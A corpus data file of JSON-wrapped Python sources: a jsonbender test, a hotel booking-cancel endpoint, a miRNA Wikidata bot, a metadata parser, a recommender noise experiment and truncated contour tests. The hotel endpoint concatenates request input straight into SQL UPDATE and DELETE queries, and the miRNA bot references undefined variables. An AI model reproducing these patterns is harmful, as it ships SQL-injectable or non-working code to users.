+{"seq_id":"134084088","text":"from jsonbender import K, S\nfrom jsonbender.string_ops import Format, ProtectedFormat\n\n\nclass TestFormat:\n @staticmethod\n def test_format():\n bender = Format(\"{} {} {} {noun}.\", K(\"This\"), K(\"is\"), K(\"a\"), noun=K(\"test\"))\n assert bender.bend(None) == \"This is a test.\"\n\n\nclass TestProtectedFormat:\n @staticmethod\n def test_format():\n bender = ProtectedFormat(\n \"{} {} {} {noun}.\",\n K(\"This\"),\n K(\"is\"),\n K(\"a\"),\n noun=S(\"noun\").optional(),\n )\n assert bender.bend({}) is None\n assert bender.bend({\"noun\": \"test\"}) == \"This is a test.\"\n","sub_path":"tests/test_string_ops.py","file_name":"test_string_ops.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"3384672","text":"import json\r\nimport random\r\nfrom sqlwrapper import gensql,dbget,dbput\r\nimport datetime\r\nfrom ApplicationDate import application_date\r\ndef HOTEL_BBL_POST_INSERT_GroupCancel(request):\r\n\r\n sql_value = json.loads(dbget(\"select block_cancel_no from business_block.block_cancel\"))\r\n print(sql_value,type(sql_value))\r\n \r\n sql_value1 = sql_value[0]['block_cancel_no']\r\n print(sql_value1,type(sql_value1))\r\n count = sql_value1 + 1\r\n psql = dbput(\"update business_block.block_cancel set block_cancel_no = '\"+str(sql_value[0]['block_cancel_no']+1)+\"'\")\r\n d = request.json\r\n d['cancellation_number'] = count\r\n print(d) \r\n sql = gensql('insert','business_block.group_cancel',d)\r\n print(sql)\r\n block_id = d.get(\"block_id\")\r\n psql = dbput(\"update business_block.business_block_definite set block_status_id = '5' where block_id = '\"+block_id+\"'\")\r\n cancelgrid = json.loads(dbget(\"select count(*) from business_block.grid where block_id= '\"+block_id+\"' \\\r\n\t union \\\r\n\t select count(*) from business_block.current_grid where block_id= '\"+block_id+\"' \"))\r\n print(cancelgrid)\r\n\r\n if cancelgrid[0]['count'] > 0:\r\n deltequery = dbput(\"delete from business_block.grid where block_id = '\"+block_id+\"' ; \\\r\n delete from business_block.current_grid where block_id = '\"+block_id+\"'\")\r\n app_datetime = application_date()\r\n #RES_Log_Time = datetime.datetime.utcnow()+datetime.timedelta(hours=5, minutes=30)\r\n RES_Log_Time = app_datetime[0]\r\n RES_Log_Date = app_datetime[1]\r\n print(RES_Log_Date)\r\n s = {}\r\n s['user_role'] = \"Admin\"\r\n\r\n s['date'] = RES_Log_Date\r\n s['time'] = RES_Log_Time\r\n s['block_id'] = d.get(\"block_id\")\r\n s['action_type_id'] = \"Group Cancelled\"\r\n s['description'] = d.get(\"cancel_description\")\r\n gensql('insert','business_block.business_block_activity_log',s)\r\n return(json.dumps({\"Return\": \"Record Inserted Successfully\",\"ReturnCode\": \"RIS\",\"Status\": \"Success\",\"StatusCode\": \"200\",'CancellationNumber':count},indent=4))\r\n","sub_path":"HOTEL_BBL_POST_INSERT_GroupCancel.py","file_name":"HOTEL_BBL_POST_INSERT_GroupCancel.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"507066341","text":"import requests\nimport sys\nimport pandas as pd\nimport pprint\nimport json\nimport time\nimport copy\n\nimport PBB_Core\n\n\ndef get_entrez_qid_map(prop_nr):\n query = '''\n SELECT * WHERE {{\n ?qid wdt:{} ?id .\n ?qid wdt:P703 wd:Q5 .\n }}\n '''.format(prop_nr)\n\n results = PBB_Core.WDItemEngine.execute_sparql_query(query=query)['results']['bindings']\n\n id_wd_map = dict()\n for z in results:\n id_wd_map[z['id']['value']] = z['qid']['value'].split('/')[-1]\n\n return id_wd_map\n\n\ndef main():\n # mirtar_base = pd.read_excel('~/Downloads/hsa_MTI(2).xlsx')\n mirtar_base = pd.read_csv('~/Downloads/hsa_MTI.csv', header=0, sep=',')\n pprint.pprint(mirtar_base.head(2))\n\n pprint.pprint(mirtar_base.iloc[1, 0])\n # pprint.pprint(mirtar_base.index)\n\n entrez_qid_map = get_entrez_qid_map('P351')\n\n # create subclass of 'mature microRNA'\n # create encoded by (if this can be determined, would be important)\n # create 'encodes' property on the genes\n # create 'found in taxon' property\n\n unique_mirs = mirtar_base['molecule_chembl_id'].unique()\n\n for mir in unique_mirs:\n\n # references = generate_refs(chembl_id)\n\n curr_mir_df = unique_mirs[unique_mirs['miRNA'] == mir]\n\n statements = list()\n\n # mature miRNA Q23838648\n\n for x in curr_mir_df.index:\n curr_mesh = curr_mir_df.loc[x, 'mesh_id']\n if pd.notnull(curr_mesh) and curr_mesh in mesh_wd_map:\n print(chembl_id, curr_mesh, 'found')\n\n\n\nif __name__ == '__main__':\n sys.exit(main())","sub_path":"rna/miRNA_bot.py","file_name":"miRNA_bot.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159236264","text":"import pandas as pd\nimport os\n\nclass MetadataList:\n\n def __init__(self):\n print(\"Metadata List Generation from CSV is getting started\" + '\\n')\n\n\n def fn_getPath(self, strParent, list):\n \n \"\"\" This routine is intended to determine the path object in run time.\n and use that path (\"|\" separated) to traverse the JSON object.\n :param:strParent: parent level tag / label to identify parent of the child\n :param:list:json metadata / schema / data dictionary\n :return:path label in string format\n \"\"\"\n try:\n strFinal = ''\n Parent_Nm = strParent.split(\"|\")[0]\n Parent_fld = strParent.split(\"|\")[1]\n\n for item in list:\n if item[1] == Parent_Nm and item[13] == Parent_fld:\n strFinal = item[8]\n return strFinal\n\n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n #return None\n\n def fn_createList(self, myList):\n \n \"\"\" This routine is intended to create a list object \n from the metadata / schema / data dictionary to traverse the JSON object accordingly.\n incorporate a runtime path in the metadata / schema per level in the given json\n :param:myList: list object representation of json metadata / schema / data dictionary\n \"\"\"\n try:\n \n strFinalList = []\n \n lineCount = 0\n for row in myList:\n my_list = []\n my_list = row\n strFinalList.append(my_list)\n lineCount += 1\n\n count = 0\n for row in strFinalList:\n if count > 0:\n if row[2] != \"1\" and row[2] != \"0\":\n strPath = self.fn_getPath(row[7], strFinalList)\n row[8] = strPath + \"|\" + row[1]\n count = count + 1\n return strFinalList\n \n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n #return None\n \n\n def fn_createMetadataList(self, file):\n\n \"\"\" This routine is intended to create a \n list object which represents metadata from the supplied CSV file.\n :param:CSV file\n :return: List object represents metadata / data dictionary / schema object\n \"\"\" \n try:\n\n if os.path.exists(file) and os.path.splitext(file)[1] == '.csv':\n df1 = pd.read_csv(file)\n df1['DOMAIN_NAME'] = 'None'\n df1['RI_NODE'] = 0\n df1['ATTRIBUTE_NAME_concat'] = df1['ATTRIBUTE_NAME'].str.strip().fillna('NO') + '~' + \\\n df1['LOGICAL_DATATYPE'].str.strip().fillna('NO') + '~' + \\\n df1['PARENT_COLUMN'].str.strip().fillna('NO')\n\n df2 = df1[['FIELD_ID', 'TABLE_NAME', 'COLUMN_NAME', 'ATTRIBUTE_NAME_concat']]\n df2 = df2.rename(columns={'FIELD_ID': 'RI_NODE',\n 'TABLE_NAME': 'RI_DBTABLE',\n 'COLUMN_NAME': 'RI_TABLEFIELDS',\n 'ATTRIBUTE_NAME_concat': 'RI_ATTRIBUTENAME'})\n\n df3 = df1.merge(df2, how='left', on='RI_NODE')\n df3 = df3.loc[df3['CURRENT_IND'] == 'Y']\n\n dframe = pd.DataFrame()\n dframe['ENTITY_NAME'] = df3['ENTITY_NAME'].str.strip()\n dframe['DOMAINTYPE'] = df3['DOMAIN_NAME'].str.strip().str.upper()\n dframe['JSON_LEVEL'] = df3['NODE_LEVEL']\n dframe['DBTABLE'] = df3['TABLE_NAME'].str.strip()\n dframe['ATTRIBUTE_NAME'] = df3['ATTRIBUTE_NAME_concat'].str.strip()\n dframe['TABLEFIELDS'] = df3['COLUMN_NAME'].str.strip()\n dframe['PARENT'] = df3['PARENT_NODE'].str.strip()\n dframe['JSON_PATH'] = df3['NODE_PATH'].str.strip().fillna('None')\n dframe['ROOTENTRY'] = df3['ROOT_FLAG']\n dframe['SRC_JSONTAG'] = df3['RI_ATTRIBUTENAME'].str.strip().fillna('None')\n dframe['IS_ACTIVE'] = df3['CURRENT_IND'].str.strip()\n dframe['RI_DBTABLE'] = df3['RI_DBTABLE'].str.strip().fillna('None')\n dframe['RI_TABLEFIELDS'] = df3['RI_TABLEFIELDS'].str.strip().fillna('None')\n dframe['ENTITY_ID'] = df3['FIELD_ID']\n dframe = dframe.reset_index(drop=True).sort_values('ENTITY_ID', ascending=True)\n #print(dframe.to_string())\n\n finalList = []\n for index, row in dframe.iterrows():\n\n if row[\"ROOTENTRY\"] == 1:\n myList = list()\n myList.append(str(row[\"DOMAINTYPE\"]))\n myList.append(str(row[\"ENTITY_NAME\"]))\n myList.append(str(row[\"JSON_LEVEL\"]))\n myList.append(str(row[\"DBTABLE\"]) + \"_array\")\n\n strFields = \"\"\n strTableFields = \"\"\n strRIJsonTAG = \"\"\n strRITable = \"\"\n strRIFieldName = \"\"\n strTableName = \"\"\n\n newFrame = dframe.loc[(dframe[\"ENTITY_NAME\"] == row[\"ENTITY_NAME\"]) & (dframe[\"PARENT\"] == row[\"PARENT\"]) & (dframe[\"DOMAINTYPE\"] == row[\"DOMAINTYPE\"]) & (dframe[\"DBTABLE\"] == row[\"DBTABLE\"])] ## newFrame is required to get all the attributes detail of the the same entity_name under root_flag = 1\n\n for index1, row1 in newFrame.iterrows():\n strTableName = str(row1[\"DBTABLE\"])\n strFields = strFields + str(row1[\"ATTRIBUTE_NAME\"]) + \",\"\n strTableFields = strTableFields + str(row1[\"TABLEFIELDS\"]) + \",\"\n if row1[\"SRC_JSONTAG\"] != None :\n strRIJsonTAG = str(row1[\"SRC_JSONTAG\"])\n strRITable = str(row1[\"RI_DBTABLE\"])\n strRIFieldName = str(row1[\"RI_TABLEFIELDS\"])\n\n myList.append(strTableName)\n myList.append(strFields[:-1])\n myList.append(strTableFields[:-1])\n myList.append(str(row[\"PARENT\"]))\n myList.append(str(row[\"JSON_PATH\"]))\n myList.append(str(row[\"IS_ACTIVE\"]))\n myList.append(strRIJsonTAG)\n myList.append(strRITable)\n myList.append(strRIFieldName)\n myList.append(str(row[\"ENTITY_ID\"]))\n\n finalList.append(myList)\n\n finalMetadataList = self.fn_createList(finalList)\n #print('FINAL METADATA LIST:')\n #print(finalMetadataList)\n\n return finalMetadataList\n\n else:\n print(\"REQUIRED CSV INPUT FILE IS NOT AVAILABLE\")\n\n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n","sub_path":"json2oraparser/MetadataController/MetadataList.py","file_name":"MetadataList.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413524049","text":"# print('install splotlight if needed')\n#!pip install git+https://github.com/maciejkula/spotlight.git@master#egg=spotlight\n\n\n# # movielense data\n# - Download the 100k version from https://grouplens.org/datasets/movielens/\n# - extract to folder './ml-100k/'\n\nimport numpy as np\nfrom spotlight.interactions import Interactions\nfrom spotlight.cross_validation import random_train_test_split\nuser_ids, item_ids, ratings, timestamps = zip(*[i.strip().split('\\t') for i in open(\"./ml-100k/u.data\").readlines()])\nuser_ids = np.array([int(u) for u in list(user_ids)])\nitem_ids = np.array([int(i) for i in list(item_ids)])\ntimestamps = np.array([int(s) for s in list(timestamps)])\ninteractions = Interactions(user_ids=user_ids, item_ids=item_ids, timestamps=timestamps)\ntrain, test = random_train_test_split(interactions)\n\n\n# Create random noise\n\n\nimport random\npreserving_25_percent_items = []\npreserving_50_percent_items = []\npreserving_75_percent_items = []\nvmin = train.item_ids.min()\nvmax = train.item_ids.max()\nfor real_item_idx in train.item_ids:\n random_item_idx = random.randint(vmin, vmax)\n sampling_threshold = random.random()\n if sampling_threshold < .25:\n preserving_25_percent_items.append(real_item_idx)\n else:\n preserving_25_percent_items.append(random_item_idx)\n if sampling_threshold < .5:\n preserving_50_percent_items.append(real_item_idx)\n else:\n preserving_50_percent_items.append(random_item_idx)\n if sampling_threshold < .75:\n preserving_75_percent_items.append(real_item_idx)\n else:\n preserving_75_percent_items.append(random_item_idx)\n\n\n# Create train data\n\n\nuser_ids = train.user_ids\ntimestamps = train.timestamps\npreserving_25_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_25_percent_items),\n timestamps=timestamps)\npreserving_50_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_50_percent_items),\n timestamps=timestamps)\npreserving_75_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_75_percent_items),\n timestamps=timestamps)\n\n\n# visulize train data\n\n\n# from matplotlib import pyplot\n# plt = pyplot.figure(figsize=(16,10))\n# pyplot.subplot(221)\n# pyplot.hist(item_ids, bins=50, alpha=0.7, label='100% item preserving', color='red')\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(222)\n# pyplot.hist(preserving_25_percent_items, bins=50, alpha=0.7, color='green', \n# label='25% item preserving, 75% random noise' )\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(223)\n# pyplot.hist(preserving_50_percent_items, bins=50, alpha=0.7, color='blue', \n# label= '50% item preserving, 50% random noise')\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(224)\n# pyplot.hist(preserving_75_percent_items, bins=50, alpha=0.7, \n# label='75% item preserving, 25% random noise')\n# pyplot.legend(loc='upper right')\n# pyplot.show()\n\n\n# create train models\n\n\nfrom spotlight.sequence.implicit import ImplicitSequenceModel\nmodel = ImplicitSequenceModel(embedding_dim=128)\npreserving_25_percent_model = ImplicitSequenceModel(embedding_dim=128)\npreserving_50_percent_model = ImplicitSequenceModel(embedding_dim=128)\npreserving_75_percent_model = ImplicitSequenceModel(embedding_dim=128)\n\n\n# fit models\n\n\nmodel.fit(train.to_sequence(), verbose=True)\npreserving_25_percent_model.fit(preserving_25_percent_train.to_sequence(), verbose=True)\npreserving_50_percent_model.fit(preserving_50_percent_train.to_sequence(), verbose=True)\npreserving_75_percent_model.fit(preserving_75_percent_train.to_sequence(), verbose=True)\n\nimport torch\ntorch.save(preserving_25_percent_model, './preserving_25_percent_model.model')\ntorch.save(preserving_50_percent_model, './preserving_50_percent_model.model')\ntorch.save(preserving_75_percent_model, './preserving_75_percent_model.model')\n# result evaluation\n\nfrom spotlight.evaluation import mrr_score\ntrain_mrrs = mrr_score(model, train)\npreserving_25_train_mrrs = mrr_score(preserving_25_percent_model, preserving_25_percent_train)\npreserving_50_train_mrrs = mrr_score(preserving_50_percent_model, preserving_50_percent_train)\npreserving_75_train_mrrs = mrr_score(preserving_75_percent_model, preserving_75_percent_train)\n\ntest_mrrs = mrr_score(model, test)\npreserving_25_test_mrrs = mrr_score(preserving_25_percent_model, test)\npreserving_50_test_mrrs = mrr_score(preserving_50_percent_model, test)\npreserving_75_test_mrrs = mrr_score(preserving_75_percent_model, test)\n\nprint('For 100% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(train_mrrs.sum(), test_mrrs.sum()))\nprint('For 25% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_25_train_mrrs.sum(), preserving_25_test_mrrs.sum()))\nprint('For 50% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_50_train_mrrs.sum(), preserving_50_test_mrrs.sum()))\nprint('For 75% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_75_train_mrrs.sum(), preserving_75_test_mrrs.sum()))","sub_path":"experience.py","file_name":"experience.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142340529","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nTests the computation of contours.\n\"\"\"\n\nimport unittest\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nfrom .context import viroconcom\n\nfrom viroconcom.params import ConstantParam, FunctionParam\n\nfrom viroconcom.distributions import (\n WeibullDistribution, ExponentiatedWeibullDistribution, LognormalDistribution,\n NormalDistribution, MultivariateDistribution)\nfrom viroconcom.contours import IFormContour, ISormContour, HighestDensityContour, DirectSamplingContour\n\n\n_here = os.path.dirname(__file__)\ntestfiles_path = os.path.abspath(os.path.join(_here, \"testfiles\"))\n\n\nclass ContourCreationTest(unittest.TestCase):\n\n def test_HDC2d_WL(self):\n \"\"\"\n 2-d HDC with Weibull and Lognormal distribution.\n\n The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006\n \"\"\"\n\n #define dependency tuple\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n #define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n #del shape, loc, scale\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 18)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt0 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1]})\n\n\n result0 = pd.read_csv(testfiles_path + \"/HDC2dWL_coordinates.csv\")\n\n for g,h in [(g, h) for g in result0.index for h in result0.columns]:\n self.assertAlmostEqual(result0.loc[g, h], finaldt0.loc[g, h], places=8)\n\n\n def test_HDC2d_ExponentiatedWbl(self):\n \"\"\"\n 2-d HDC with exponentiated Weibull distributions.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None, None) # shape, location, scale, shape2\n dep2 = (None, None, 0, None) # shape, location, scale, shape2\n\n # Define parameters.\n v_shape = ConstantParam(11)\n v_loc = None\n v_scale = ConstantParam(2.6)\n v_shape2 = ConstantParam(0.54)\n par1 = (v_shape, v_loc, v_scale, v_shape2)\n\n hs_shape = ConstantParam(1.4)\n hs_loc = None\n hs_scale = FunctionParam('power3', 0.15, 0.0033, 2.45)\n hs_shape2 = ConstantParam(5)\n par2 = (hs_shape, hs_loc, hs_scale, hs_shape2)\n\n # Create distributions.\n dist1 = ExponentiatedWeibullDistribution(*par1)\n dist2 = ExponentiatedWeibullDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate the contour.\n n_years = 50\n limits = [(0, 20), (0, 18)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n # If we knew the correct coordinates we could continue with something like\n # this:\n #contour_coordinates = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n # 'y' : test_contour_HDC.coordinates[0][1]})\n #result0 = pd.read_csv(testfiles_path + \"/filename.csv\")\n #for g,h in [(g, h) for g in result0.index for h in result0.columns]:\n # self.assertAlmostEqual(result0.loc[g, h], contour_coordinates.loc[g, h], places=8)\n\n\n def test_omae2020_wind_wave_contour(self):\n \"\"\"\n Contour similar to the wind-wave contour in 'Global hierararchical models\n for wind and wave contours', dataset D. First variable = wind speed,\n second variable = significant wave height.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None, None) # shape, location, scale, shape2\n dep2 = (0, None, 0, None) # shape, location, scale, shape2\n\n # Define parameters.\n v_shape = ConstantParam(2.42)\n v_loc = None\n v_scale = ConstantParam(10)\n v_shape2 = ConstantParam(0.761)\n par1 = (v_shape, v_loc, v_scale, v_shape2)\n\n hs_shape = FunctionParam('logistics4', 0.582, 1.90, 0.248, 8.49)\n hs_loc = None\n hs_scale = FunctionParam('alpha3', 0.394, 0.0178, 1.88,\n C1=0.582, C2=1.90, C3=0.248, C4=8.49)\n\n hs_shape2 = ConstantParam(5)\n par2 = (hs_shape, hs_loc, hs_scale, hs_shape2)\n\n # Create distributions.\n dist1 = ExponentiatedWeibullDistribution(*par1)\n dist2 = ExponentiatedWeibullDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate the contour.\n n_years = 50\n limits = [(0, 40), (0, 20)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 1,\n limits, deltas)\n\n # Compare the computed contours to the contours published in\n # 'Global hierarchical models for wind and wave contours', Figure 8.\n max_v = max(test_contour_HDC.coordinates[0][0])\n self.assertAlmostEqual(max_v, 29.5, delta=0.5) # Should be about 29.5\n max_hs = max(test_contour_HDC.coordinates[0][1])\n self.assertAlmostEqual(max_hs, 14.5, delta=0.5) # Should be about 15\n\n\n def test_HDC3d_WLL(self):\n \"\"\"\n Contour example for 3-d HDC with Weibull, Lognormal and\n Lognormal distribution.\n \"\"\"\n\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, None, 0)\n\n #define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n\n #del shape, loc, scale\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 18),(0, 18)]\n deltas = [1, 1, 1]\n\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1],\n 'z' : test_contour_HDC.coordinates[0][2]})\n\n\n result = pd.read_csv(testfiles_path + \"/HDC3dWLL_coordinates.csv\")\n for i,j in [(i, j) for i in result.index for j in result.columns]:\n self.assertAlmostEqual(result.loc[i,j], finaldt.loc[i,j], places=8)\n\n\n def test_HDC4d_WLLL(self):\n \"\"\"\n Contour example for a 4-dimensinal HDC with Weibull, Lognormal,\n Lognormal and Lognormal distribution.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, None, 0)\n dep4 = (0, None, 0)\n\n # Define parameters.\n shape = ConstantParam(2.776)\n loc = ConstantParam(1.471)\n scale = ConstantParam(0.8888)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n dist4 = LognormalDistribution(mu=mu, sigma=sigma)\n\n\n distributions = [dist1, dist2, dist3, dist4]\n dependencies = [dep1, dep2, dep3, dep4]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute contour.\n n_years = 50\n limits = [(0, 20), (0, 18), (0, 18), (0, 18)]\n deltas = [1, 1, 1, 1]\n\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n\n\n def test_HDC2d_WN(self):\n \"\"\"\n Creating a contour example.\n \"\"\"\n\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 4, 10, 0.02)\n scale = FunctionParam('exp3', 0.1, 0.02, -0.1)\n par2 = (shape, loc, scale)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute the contour.\n n_years = 50\n limits = [(0, 20), (0, 20)]\n deltas = [0.05, 0.01]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt2 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1]})\n\n result2 = pd.read_csv(testfiles_path + \"/HDC2dWN_coordinates.csv\")\n\n for k,l in [(k, l) for k in result2.index for l in result2.columns]:\n self.assertAlmostEqual(result2.loc[k,l], finaldt2.loc[k,l], places=8)\n\n\n\n def test_HDC3d_WLN(self):\n\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 4, 10, 0.02)\n scale = FunctionParam('exp3', 0.1, 0.02, -0.1)\n par2 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1, 1.5, 0.2)\n sigma = FunctionParam('exp3', 0.1, 0.2, -0.2)\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n del mu, sigma\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 20),(0, 20)]\n deltas = [0.5, 0.5, 0.05]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt3 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1],\n 'z' : test_contour_HDC.coordinates[0][2]})\n\n matlab3 = pd.read_csv(testfiles_path + \"/hdc3d_wln.csv\", names=['x', 'y', 'z'])\n\n result3 = pd.read_csv(testfiles_path + \"/HDC3dWLN_coordinates.csv\")\n for m,n in [(m, n) for m in result3.index for n in result3.columns]:\n self.assertAlmostEqual(result3.loc[m, n], finaldt3.loc[m, n], places=8)\n\n def test_IForm2d_WL(self):\n \"\"\"\n 2-d IFORM contour.\n\n The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006 .\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x' : test_contour_IForm.coordinates[0][0],\n 'y' : test_contour_IForm.coordinates[0][1]})\n #calculated_coordinates.to_csv('save_this_file.csv', sep=',', header=['x', 'y'], index=False)\n\n true_coordinates = pd.read_csv(testfiles_path + \"/IForm2dWL_coordinates.csv\")\n for o,p in [(o, p) for o in true_coordinates.index for p in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[o, p], true_coordinates.loc[o, p], places=8)\n\n def test_IForm2d_WN(self):\n \"\"\"\n 2-d IFORM contour.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (None, 0, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n shape = None\n loc = FunctionParam('power3', 7, 1.489, 0.1901)\n scale = FunctionParam('exp3', 1.5, 0.1748, -0.2243)\n par2 = (shape, loc, scale)\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = NormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x' : test_contour_IForm.coordinates[0][0],\n 'y' : test_contour_IForm.coordinates[0][1]})\n\n true_coordinates = pd.read_csv(testfiles_path + \"/IForm2dWN_coordinates.csv\")\n\n for r,s in [(r, s) for r in true_coordinates.index for s in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[r, s], true_coordinates.loc[r, s], places=8)\n\n def test_IForm3d(self): # TODO what does this test do\n \"\"\"\n 3-dimensional IFORM contour.\n \"\"\"\n\n # Define dependency tuple.\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n dep3 = (0, 